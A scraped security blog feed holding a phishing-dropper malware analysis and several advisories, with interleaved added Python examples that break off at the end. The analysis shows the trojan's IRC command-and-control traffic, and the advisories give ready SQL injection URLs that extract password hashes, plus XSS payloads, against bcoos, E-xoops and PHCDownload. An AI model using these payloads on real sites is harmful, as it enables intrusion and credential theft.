few popups,<br />and after closing all the popups it closes the other windows<br />too, including the first window that was open with Google :O<br /><br /><strong>Demo of exploit:</strong><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/explorer/browser_die.html" target="_BLANK"><form><br /><input value="Press Me" type="button" onclick=javascript:window.open('http://usuarios.lycos.es/reyfuss/xss/images/explorer/browser_die.html')></form></a><br /><br />Thanks to imydes from www.imydes.com for his support.<br /><br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: <a href="http://lostmon.blogspot.com/" target="_blank">http://Lostmon.blogspot.com</a><br />Google group: <a href="http://groups.google.com/group/lostmon" target="_blank">http://groups.google.com/group/lostmon</a> (new)<br />--<br />Curiosity is what moves the mind...<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-26197364911610875152008-03-12T11:36:00.002-07:002008-03-13T12:06:22.269-07:00Gusanito.exe descarga troyano bancario y conecta a irc########################################################<br />Gusanito.exe downloads a banking trojan and connects to IRC<br />Original article: http://lostmon.blogspot.com/2008/03/<br />gusanitoexe-descarga-troyano-bancario-y.html<br />########################################################<br /><br />Today I received a new phishing attempt disguised<br />as a greeting card from gusanito.com.<br /><br />After a brief study of it, I discovered that<br />the link on the card leads to the direct download of<br />a file called "gusanito.exe".<br /><br />##########################<br />Image of the mail<br />##########################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/vista_mail.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/vista_mail.GIF" height="250" width="400"></a><br /><br />I downloaded the executable, and after analyzing the<br />file, I was surprised by how little the fraud attempt<br />itself is hidden.<br /><br />###########################<br />Image of the mail headers<br />###########################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/vista_mail_cabeceras.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/vista_mail_cabeceras.GIF" height="250" width="400"></a><br /><br />If the unwary user downloaded and executed it (it hides<br />behind the icon of a drawing), the file<br />conceals a banking trojan called winmedia.exe.<br />The trojan is Trojan-Spy.Win32.Banker.anv or one of<br />its variants; its information can be consulted here:<br /><br />http://www.viruslist.com/en/viruses/encyclopedia?virusid=105552<br /><br /><br />If we look at the hex dump of the executable "gusanito.exe",<br /> we find several curious things:<br /><br /> The path where the attacker compiled his project, as<br /> well as the user name he was logged in with on his<br /> machine.<br /> <br />C : \ D o c u m e n t s a n d S e t t i n g s \ h u g o \<br /> E s c r i t o r i o \ H u g o T o o l s F I N A L I S I M O<br /> 3 . 0 \ H u g o T o o l s \ D R O N E S \ P r o y e c t o 1 . v b p <br /> <br /> In the code we can also see that it interacts with MSN, obtaining<br /> the contact list and sending a message to the contacts with several<br /> different texts, imitating some of the typical MSN viruses<br /> with messages like "mira estas fotos" or "mira este video hermoso hermoso<br /> hermoso", among others (they can be seen clearly in the hex dump),<br /> <br /> thus launching the URL at the victim user together with the phrase.<br /> <br /> #########################################<br /> Image of the MSN key and image of the MSN phrases<br /> #########################################<br /> <a href="http://usuarios.lycos.es/reyfuss/pshishing/hexa_msn.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/hexa_msn.GIF" height="250" width="400"></a><br /><br /><center><a href="http://usuarios.lycos.es/reyfuss/pshishing/hexa_frases.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/hexa_frases.GIF" height="250" width="400"></a></center><br /> <br /> #############################################<br />Image of the download link and the Windows registry key<br />###############################################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/clave_descrga.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/clave_descrga.GIF" height="250" width="400"></a><br /><br />In addition, a connection is established to the server ccpower.com.mx<br />over IRC with a nick Drone??? where ??? are random numbers,<br />joining the channel #banamex, where of the almost 400 users<br />in the channel, 90% are infected victims.<br /><br />#############################<br />IRC connection<br />#############################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/hexa_irc.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/hexa_irc.GIF" height="250" width="400"></a><br /><br />It is from this channel that the victim users<br />are controlled, passing through the channel the e-mail addresses<br />of the victims' contacts and obtaining the data<br />that the attacker was able to capture, either<br />through the trojan or through the keylogger functions<br />the executable has.<br /><br />############################################<br />Image of the IRC view<br />############################################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/vista_irc.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/vista_irc.GIF" height="250" width="400"></a><br /><br /><br />Needless to say, I was banned from their IRC...<br />I think they have no sense of humor XDDDD<br /><br />The protection is the same as always: do not download<br />files from untrusted sources,<br /><br />keep your antivirus updated,<br /><br />AND DO NOT EXECUTE ANYTHING WITHOUT KNOWING WHAT IT IS AND WITHOUT<br />SCANNING IT FIRST WITH AN ANTIVIRUS!<br /><br />################################<br />Automated analysis of the file<br />(thanks to Jose Luis)<br />################################<br /><br />An automated scan gives this:<br /><br />It tries to replicate across a network.<br /><br />It copies itself into the Windows folder:<br /><br /> C:\Windows\WinMedia.exe<br /><br />It creates or modifies the following registry entries:<br /><br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IpInIp<br /><br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IASSDO<br /> EnableFileTracing = 0x00000000<br /> EnableConsoleTracing = 0x00000000<br /> FileTracingMask = 0xFFFF0000<br /> ConsoleTracingMask = 0xFFFF0000<br /> MaxFileSize = 0x00100000<br /> FileDirectory = "%windir%\tracing"<br /><br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br /> SystemMigration = "%Windir%\WinMedia.exe"<br /><br />It tries to connect to the following address:<br /><br /> irc.ccpower.com.mx<br /><br />It connects and sends the following data:<br /><br /> USER nomail@nomail.com localhost9195 irc.ccpower.com.mx :botitooo<br /> NICK Drone-919-5<br /> JOIN :#banamex<br /> PONG :response<br /> PONG ::+i<br /> PONG :list.<br /> PONG ::.VERSION.<br /> PONG ::.status<br /> PONG ::.id<br /> PONG ::.stats<br /> PONG ::.uptime<br /> PONG :PROCESS_NAME_TO_TERMINATE<br /> PONG ::.ident<br /> PONG ::.keylog<br /> PONG ::.httpserver<br /> PONG :50<br /> PONG :-r<br /> PONG :60<br /> USER nomail@nomail.com localhost11606 irc.ccpower.com.mx :botitooo<br /> NICK Drone-1160-6<br /><br /><br />#################€nd#####################<br /><br />Thanks to Jose Luis from http://www.vsantivirus.com<br /> for the automated analysis, his patience and help :)<br /><br />Thanks to estrella for being my light.<br />Thanks to FalconDeOro for his support.<br />Thanks to Imydes from http://www.imydes.com<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">
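The IRC handshake and the Run key from the automated analysis are the indicators a defender can match on. The following Python is an added example (not from the post or the sandbox) that scores captured IRC lines against those indicators and checks a Run key listing for the dropper's autostart entry; the sample sessions are constructed, the infected one from the lines above.

```python
import re

# Indicators taken from the automated analysis of gusanito.exe in this post
USER_RE = re.compile(r'^USER\s+nomail@nomail\.com\s+\S+\s+irc\.ccpower\.com\.mx\s+:botitooo$')
NICK_RE = re.compile(r'^NICK\s+Drone-\d+-\d+$')
JOIN_RE = re.compile(r'^JOIN\s+:?#banamex$')
# Bot commands the sample echoes back inside PONG replies
BOT_CMD_RE = re.compile(r'^PONG\s+::\.(keylog|httpserver|VERSION|status|id|stats|uptime|ident)\.?$')
# Autostart value the dropper writes under CurrentVersion\Run
PERSIST_RE = re.compile(r'\\WinMedia\.exe"?$', re.IGNORECASE)

# Constructed sessions: the first reuses the lines the sandbox captured,
# the second is an ordinary client registration for comparison.
SESSION_INFECTED = [
    'USER nomail@nomail.com localhost9195 irc.ccpower.com.mx :botitooo',
    'NICK Drone-919-5',
    'JOIN :#banamex',
    'PONG :response',
    'PONG ::.keylog',
]
SESSION_BENIGN = [
    'NICK lostmon',
    'USER lostmon 0 * :Lostmon',
    'JOIN #security',
    'PONG :irc.example.net',
]


def score_irc_session(lines):
    """Return (line, reason) pairs for every line matching a Drone indicator."""
    hits = []
    for raw in lines:
        line = raw.strip()
        if USER_RE.match(line):
            hits.append((line, 'bot USER registration'))
        elif NICK_RE.match(line):
            hits.append((line, 'Drone-NNN-N nick pattern'))
        elif JOIN_RE.match(line):
            hits.append((line, 'joins C2 channel #banamex'))
        elif BOT_CMD_RE.match(line):
            hits.append((line, 'bot command answered via PONG'))
    return hits


def is_drone_session(lines, threshold=3):
    """Flag a session only when at least `threshold` distinct indicator kinds
    are present, so a lone PONG or a coincidental nick does not fire."""
    return len({reason for _, reason in score_irc_session(lines)}) >= threshold


def persistence_hits(run_values):
    """Given Run key values as {name: command}, return the names whose command
    points at WinMedia.exe, the SystemMigration entry the analysis lists."""
    return [name for name, cmd in run_values.items() if PERSIST_RE.search(cmd)]
```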
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-89087042271360256382008-02-07T12:32:00.000-08:002008-02-07T12:58:59.519-08:00bcoos /mysections/ratefile.php lid variable SQL injection############################################<br />bcoos /mysections/ratefile.php lid variable SQL injection<br />Vendor URL: http://www.bcoops.net<br />Advisory: http://lostmon.blogspot.com/2008/02/<br />bcoos-mysectionsratefilephp-lid.html<br />Vendor notified: NO. Exploits available: YES<br />############################################<br /><br />bcoos is a content-community management system written in PHP-MySQL.<br /><br />bcoos contains a flaw that may allow an attacker to carry out<br />an SQL injection attack. The issue is due to the script not<br />properly sanitizing user-supplied input to the 'lid' variable<br />of the mysections/ratefile.php script. This may allow an attacker to<br />inject or manipulate SQL queries in the backend database.<br /><br /><br /><br />#################<br />Versions:<br />#################<br /><br />bcoos =< 1.0.11 vulnerable<br /><br />#################<br />Solution:<br />#################<br /><br />No solution at this time!<br />Alternatively, you can try to edit the source code and<br />add this code to mitigate 'union' injection:<br /><br />Open modules/mysections/ratefile.php<br /><br />Around line 76 you find this code:<br /><br />exit();<br />} else {<br /><br />You can change it to:<br /><br />exit();<br />} <br />if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br /> else {<br /><br />And now this union SQL attack is patched :D<br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered: 31-01-2008<br />Vendor notified: --------<br />Vendor response: -------<br />Disclosure: 07-02-2008<br /><br /><br />#################<br />SQL injection:<br />#################<br /><br /><br />http://localhost/modules/mysections/ratefile.php?lid=<br />-99%20UNION%20SELECT%20pass%20FROM%20bcoops_users%20LIMIT%201<br /><br /><br /><br />#######################€nd##############################<br /><br /><br /><br />Thanks to estrella for being my light.<br />Thanks to FalconDeOro for his support.<br />Thanks to Imydes from http://www.imydes.com<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-44168702099465320952008-02-04T11:46:00.000-08:002008-02-04T11:56:05.369-08:00bcoos & E-xoops DevTracker module two variables XSS############################################<br />bcoos & E-xoops DevTracker module two variables XSS<br />Vendor URL: http://www.bcoos.net<br />Vendor URL: http://www.e-xoops.com<br />Advisory: http://lostmon.blogspot.com/2008/02/<br />bcoos-and-e-xoops-devtracker-module-two.html<br />Vendor notified: yes. Exploits available: YES<br />############################################<br /><br /><br /><br />bcoos and E-xoops are two content-community management<br />systems written in PHP-MySQL.<br /><br />bcoos and E-xoops contain a flaw that allows a remote<br />cross-site scripting attack. This flaw exists because the<br />application does not validate the 'order_by' and 'direction'<br />variables upon submission to the 'index.php' script in the<br />DevTracker module. This could allow a user to create a<br />specially crafted URL that would execute arbitrary code<br />in a user's browser within the trust relationship<br />between the browser and the server, leading to a loss of integrity.<br /><br /><br /><br />#################<br />Versions:<br />#################<br /><br />bcoos =< 1.1.11 DevTracker (3.0?)<br />E-xoops =< 1.0.8 DevTracker v0.20<br /><br />And possibly earlier versions with this module installed.<br /><br />Here you have a source reference for<br />E-xoops 1.0.8: http://phpxref.com/xref/exoops/nav.html<br /><br /><br />#################<br />Solution:<br />#################<br /><br />No solution available at this time.<br />Try to edit the source code.<br /><br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered: 01-02-2008<br />Vendor notified: 03-02-2008<br />Vendor response: -------<br />Disclosure: 04-02-2007<br /><br />#############<br />Examples<br />#############<br /><br />http://[victim]/modules/devtracker/index.php?proj_id=1&order_by=<br />priority&direction=ASC"><script>alert()</script><br /><br />http://[Victim]/modules/devtracker/index.php?proj_id=1<br />&order_by=priority"><script>alert()</script><br />&direction=ASC<br /><br /><br />#######################€nd###################<br /><br /><br /><br />Thanks to estrella for being my light.<br />Thanks to FalconDeOro for his support.<br />Thanks to Imydes from http://www.imydes.com<br /><br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-738843414434749682007-12-28T11:11:00.000-08:002007-12-28T13:41:12.819-08:00XSS Flaw & posible SQL injection in search.php in PHCDownload###############################################<br />XSS flaw & possible SQL injection in PHCDownload<br />Vendor URL: http://www.phpcredo.com/<br />Advisory: http://lostmon.blogspot.com/2007/12/<br />xss-flaw-posible-sql-injection-in.html<br />Vendor notified: YES. Exploit available: YES<br />###############################################<br /><br />New XSS flaw & possible SQL injection in search.php<br /> <br />PHCDownload contains a flaw that allows a remote cross-site<br />scripting attack. This flaw exists because the application does<br />not validate the 'string' variable upon submission to the 'search.php'<br />script.<br /><br />This could allow a user to create a specially crafted URL that<br />would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />Versions:<br /><br />1.1.0 affected.<br /><br />Example:<br /><br />We can try to inject some normal HTML or JavaScript code:<br /><br />Code:<br /><br />"><h1><a href="http://lostmon.blogspot.com">Lostmon</a> Was Here !!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe src="http://lostmon.blogspot.com"></iframe></p><br /><br />or inject the code directly in hex values:<br /><br />Code:<br /><br />%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E<br />Example in hex:<br /><br />http://localhost/phcdownload/search.php?string=[XSS-CODE]<br /><br />This variable is also vulnerable to SQL injection.<br /><br />If we look at the source code of search.php around line 36 we have:<br /><br />Code:<br />// Prepare search query<br /> if( $kernel->config['archive_search_mode'] == 1 )<br /> {<br /> $search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' IN BOOLEAN MODE )";<br /> }<br /> else<br /> {<br /> $search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' )";<br /> }<br />The value of 'string' is inserted directly into the SQL query, and this could be dangerous...<br /><br />We can try to disclose the query:<br /><br />http://localhost/phcdownload/upload/search.php?string='<br /><br />I made several tests, but I have not found a working exploit or an<br />exploitable angle for this issue, but... it needs to be patched.<br /><br />Thanks to estrella for being my light.<br />Thanks to all the Lostmon Group Team.<br /><br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-6836256203663886572007-12-09T07:00:00.001-08:002007-12-09T08:45:15.088-08:00E-xoops multiple variable/scripts SQL injection############################################<br />E-xoops multiple variable/scripts SQL injection<br />vendor url: http://www.e-xoops.com<br />Advisory: http://lostmon.blogspot.com/2007/12/e-xoops-multiple-variablescripts-sql.html<br />vendor notified: NO exploits available: YES<br />############################################<br /><br /><br />E-xoops is a content/community management system written in PHP and MySQL.<br /><br />E-xoops contains a flaw that may allow an attacker to carry out a SQL injection attack. The issue is due to multiple scripts not properly sanitizing user-supplied input to the 'lid', 'bid' and 'gid' parameters. This may allow an attacker to inject or manipulate SQL queries in the backend database.<br /><br /><br />#################<br />Versions:<br />#################<br /><br />E-Xoops 1.08<br />E-Xoops 1.05 Rev3<br />E-Xoops 1.05 Rev2<br />E-Xoops 1.05 Rev1<br /><br />and possibly earlier versions.<br /><br />#################<br />Solution:<br />#################<br /><br />No solution is available at this time; try editing the source code. You can look at this post in my group to patch E-xoops, because the source code is very similar to the bcoos CMS:<br /><br />http://groups.google.com/group/lostmon/browse_thread/thread/59f3b836fad5b009<br /><br />And here you have a source reference for E-xoops 1.0.8: http://phpxref.com/xref/exoops/nav.html<br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered: 25-11-2007<br />vendor notified: --------<br />vendor response: -------<br />disclosure: 09-12-2007<br /><br /><br />#################<br />SQL injections:<br />#################<br /><br /><br />http://localhost/e-xoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/mydownloads/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/banners/click.php?op=click&bid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br />http://localhost/e-xoops/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201<br /><br /><br />#################### €nd ########################<br /><br /><br /><br />Thanks to Estrella for being my light<br />Thanks to FalconDeOro for his support<br />Thanks to Imydes from http://www.imydes.com<br /><br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
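What the lid payload above actually does to a rating lookup, replayed by the editor against an in-memory SQLite database. This is an added example, not E-xoops code; the same payload (with bcoos_users in place of e_xoops_users) is used in the bcoos advisories further down this page, and the mechanics are identical, so one example serves both. The table layout and rows are constructed for the demo and are assumptions: a links table with an integer lid column (the name e_xoops_mylinks_links is made up) and a users table whose name, e_xoops_users, and pass column are the only names taken from the advisory.

```python
"""Added example (editor's code, not E-xoops's or bcoos's): what the advisory's
lid payload does to a rating lookup, replayed against an in-memory SQLite
database, beside the parameterised and integer-cast versions that stop it.

Constructed/assumed: the table layout and rows below. Only the payload and the
name e_xoops_users come from the advisory; the links table name is made up.
"""
import sqlite3

# The advisory's lid value after URL decoding (%20 -> space).
PAYLOAD = "-1 UNION SELECT pass FROM e_xoops_users LIMIT 1"

# Constructed sample data: one link row and one user with a password hash.
SCHEMA = """
CREATE TABLE e_xoops_mylinks_links (lid INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE e_xoops_users (uid INTEGER PRIMARY KEY, uname TEXT, pass TEXT);
INSERT INTO e_xoops_mylinks_links VALUES (1, 'Lostmon blog');
INSERT INTO e_xoops_users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_title_vulnerable(con: sqlite3.Connection, lid: str) -> list:
    """The pattern the advisory describes: lid is pasted into the SQL text.

    With the payload the statement becomes
      SELECT title FROM e_xoops_mylinks_links WHERE lid=-1
      UNION SELECT pass FROM e_xoops_users LIMIT 1
    so the 'title' the script goes on to display is really a password hash.
    """
    sql = "SELECT title FROM e_xoops_mylinks_links WHERE lid=%s" % lid
    return [row[0] for row in con.execute(sql)]


def lookup_title_parameterised(con: sqlite3.Connection, lid: str) -> list:
    """Bound parameter: the whole string is data compared against the column."""
    sql = "SELECT title FROM e_xoops_mylinks_links WHERE lid=?"
    return [row[0] for row in con.execute(sql, (lid,))]


def lookup_title_cast(con: sqlite3.Connection, lid: str) -> list:
    """Integer coercion first (intval()'s job in PHP), then a bound parameter."""
    try:
        lid_int = int(lid)
    except ValueError:
        return []
    return [row[0] for row in con.execute(
        "SELECT title FROM e_xoops_mylinks_links WHERE lid=?", (lid_int,))]


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, lid=1       :", lookup_title_vulnerable(con, "1"))
    print("vulnerable, lid=payload :", lookup_title_vulnerable(con, PAYLOAD))
    print("parameterised, payload  :", lookup_title_parameterised(con, PAYLOAD))
    print("cast, payload           :", lookup_title_cast(con, PAYLOAD))
```

The UNION works because the injected SELECT returns the same number of columns as the original one; in the real modules the ratings query selects more than one column, so an attacker pads the UNION with extra values, but the principle is the same. Either of the two safe versions is enough on its own; the cast is the cheaper change to an existing code base.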
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-22459997786439420172007-12-02T10:59:00.000-08:002007-12-06T03:49:42.768-08:00Possible patch for SQL Injections In bcoos 1.0.10############################################<br />Possible patch for SQL Injections In bcoos 1.0.10<br />vendor url: http://www.bccos.net<br />Patch by Lostmon. (lostmon@gmail.com)<br />Original article: http://lostmon.blogspot.com/2007/12/posible-patch-for-sql-injections-in.html<br />############################################<br /><br />In the last week several researchers and I have found multiple critical SQL injections in bcoos 1.0.10 and prior versions.<br /><br />After a quick look at the product's source code I have found a simple patch. This is not an official patch, but it works fine until the vendor releases an official patch or a new release.<br /><br />You can use this modification to mitigate these SQL injections; it only needs to detect the 'union' SQL keyword.<br /><br />Caveat: this is a blacklist, not a fix. It only rejects 'union' when it is surrounded by spaces, '*' or '+' (plus any '*' at all), so other separators between the keywords, such as a tab or a newline, are not caught, and the "%20union%20" pattern can never match because PHP has already URL-decoded $_GET by the time the script sees it. The robust fix is to cast the id parameter to an integer before it reaches the query; use the blacklist only as a stopgap until then.<br /><br /><br />##########################<br />Sample code<br />##########################<br />You need to add this code to all affected files...<br /><br /><br />if (eregi("%20union%20", $lid) || eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br /><br />###########################<br />patch mylinks/ratelink.php<br />############################<br /><br />Open ratelink.php; around line 73 you have an 'else' like } else {<br /><br />Put the code just before the else condition, like this:<br /><br />}<br />if (eregi("%20union%20", $lid) || eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br />else {<br /><br />Save and close the file; it is now patched. Try the exploit to verify:<br /><br />http://localhost/bcoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />###############################<br />patch adresses/ratefile.php<br />##############################<br /><br />Open ratefile.php; around line 70 you have an else like } else {<br /><br />Put the code just before the else condition, like this:<br /><br />}<br />if (eregi("%20union%20", $lid) || eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br />else {<br /><br />Save and close the file; it is now patched. Try the exploit to verify:<br /><br />http://localhost/bcoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />###############################<br />patch mysections/ratefile.php<br />##############################<br /><br />Open ratefile.php; around line 77 you have an else like } else {<br /><br />Put the code just before the else condition, like this:<br /><br />}<br />if (eregi("%20union%20", $lid) || eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br />else {<br /><br />Save and close the file; it is now patched. Try the exploit to verify:<br /><br />http://localhost/bcoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />############################<br />patch banners/click.php<br />############################<br /><br />Open click.php; around line 5 you have $bid = $_GET['bid'];<br /><br />Put the code just after that line:<br /><br />if (eregi("%20union%20", $bid) || eregi(" union ", $bid) || eregi("\*union\*", $bid) || eregi("\+union\+", $bid) || eregi("\*", $bid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br /><br />Save and close the file; it is now patched. Try the exploit to verify:<br /><br />http://localhost/bcoops/modules/banners/click.php?bid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201<br /><br />###########################<br />patch arcade/index.php<br />############################<br /><br /><br />Open index.php; around line 15 you have a switch($act)<br /><br /><br />Put the code just before the switch:<br /><br /><br />if (eregi("%20union%20", $gid) || eregi(" union ", $gid) || eregi("\*union\*", $gid) || eregi("\+union\+", $gid) || eregi("\*", $gid))<br />{<br />echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br /><br />You can patch all of the rating files with the same code, because the rating code and functions are similar across the different modules.<br /><br />###################-€nd-#######################<br /><br />Thanks to Estrella for being my light.<br />Thanks to all the Lostmon Group Team !!<br />Thanks to all the OSVDB manglers !!! Waiting for OSVDB 2.0 !!!<br />Thanks to orinico, now I know how I can do it :D<br /><br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
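To see how far the unofficial blacklist above actually reaches, here is an editor's example (added here, not bcoos code nor the author's patch) that ports the five eregi() tests to Python so they can be exercised, and puts them next to the fix that does not depend on pattern matching: coerce the id to an integer, as PHP's intval() does. Of the inputs, only the first is the advisory's own payload; the tab and newline variants and the table name bcoos_mylinks_links are constructed for the demo.

```python
"""Added example (editor's code, not bcoos's): the 'union' blacklist from the
patch above, ported from PHP eregi() to Python so it can be exercised, next to
the fix that does not depend on pattern matching: coerce the id to an integer.

Constructed/assumed: every input except 'advisory', and the table name
bcoos_mylinks_links in the sample query.
"""
import re

# The five eregi() patterns from the patch. With the backslash escapes resolved
# none of them contains a regex metacharacter, so each is a plain
# case-insensitive substring test. Note that '*' alone already subsumes '*union*'.
BLACKLIST = ("%20union%20", " union ", "*union*", "+union+", "*")


def blacklist_blocks(lid: str) -> bool:
    """Port of the patch's if-condition: True when the request would be rejected."""
    lowered = lid.lower()
    return any(needle in lowered for needle in BLACKLIST)


def php_intval(value: str) -> int:
    """Mimics PHP intval() on a string: leading optional-sign integer, else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def where_clause_after_cast(lid: str) -> str:
    """What reaches the database once the id has been cast (assumed table name)."""
    return "SELECT * FROM bcoos_mylinks_links WHERE lid=%d" % php_intval(lid)


# Constructed inputs. 'advisory' is the payload from the bcoos advisories; the
# next two keep the same SQL but separate UNION from its neighbours with a tab
# or a newline, both of which MySQL accepts as whitespace and the blacklist
# never looks for.
INPUTS = {
    "advisory": "-1 UNION SELECT pass FROM bcoos_users LIMIT 1",
    "tab":      "-1\tUNION\tSELECT pass FROM bcoos_users LIMIT 1",
    "newline":  "-1\nUNION\nSELECT pass FROM bcoos_users LIMIT 1",
    "benign":   "42",
}


def report() -> dict:
    """name -> (blocked by the blacklist?, value the cast reduces it to)."""
    return {name: (blacklist_blocks(v), php_intval(v)) for name, v in INPUTS.items()}


if __name__ == "__main__":
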